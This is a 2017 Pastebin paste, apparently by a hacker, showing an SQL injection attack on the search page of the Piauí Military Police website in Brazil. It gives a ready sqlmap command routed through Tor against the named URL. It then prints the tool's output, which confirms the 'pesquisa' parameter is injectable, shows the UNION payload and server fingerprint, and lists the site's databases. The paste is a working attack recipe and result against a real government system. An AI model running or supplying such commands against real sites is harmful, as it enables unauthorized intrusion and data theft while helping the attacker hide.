Advertisement
Frenetic

[Frenetic] SQL Injection - Polícia Militar do Piauí

Aug 3rd, 2017
205
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.55 KB | None | 0 0
  1. [Twitter]: https://twitter.com/0xFrenetic
  2. PoC: http://www.pm.pi.gov.br/buscar.php
  3. # Execute: ./sqlmap.py --tor --tor-type=SOCKS5 -u http://www.pm.pi.gov.br/buscar.php --form --dbs --random-agent
  4. PrintScreen: http://i.imgur.com/jkYCB4d.png
  5.  
  6. [#2] form:
  7. POST http://www.pm.pi.gov.br:80/buscar.php
  8. POST data: pesquisa=
  9. do you want to test this form? [Y/n/q]
  10. > Y
  11. Edit POST data [default: pesquisa=] (Warning: blank fields detected): [Enter]
  12. do you want to fill blank fields with random values? [Y/n] Y
  13.  
  14. [16:30:27] [INFO] POST parameter 'pesquisa' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
  15. [16:30:27] [INFO] checking if the injection point on POST parameter 'pesquisa' is a false positive
  16. POST parameter 'pesquisa' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
  17. sqlmap identified the following injection point(s) with a total of 136 HTTP(s) requests:
  18. ---
  19. Parameter: pesquisa (POST)
  20. Type: UNION query
  21. Title: Generic UNION query (NULL) - 6 columns
  22. Payload: pesquisa=EFFw') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qxqbq','NQxxIsSZSEPCyiXZhBQJcBABIkPjScTJREYfLYqR'),'qzkvq')-- rJVs
  23. ---
  24. do you want to exploit this SQL injection? [Y/n]
  25. [16:30:56] [INFO] testing MySQL
  26. [16:30:58] [INFO] confirming MySQL
  27. [16:31:01] [INFO] the back-end DBMS is MySQL
  28. web server operating system: Linux Debian 6.0 (squeeze)
  29. web application technology: PHP 5.3.3, Apache 2.2.16
  30. back-end DBMS: MySQL >= 5.0.0
  31. [16:31:01] [INFO] fetching database names
  32. available databases [2]:
  33. [*] conteudopm
  34. [*] information_schema
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement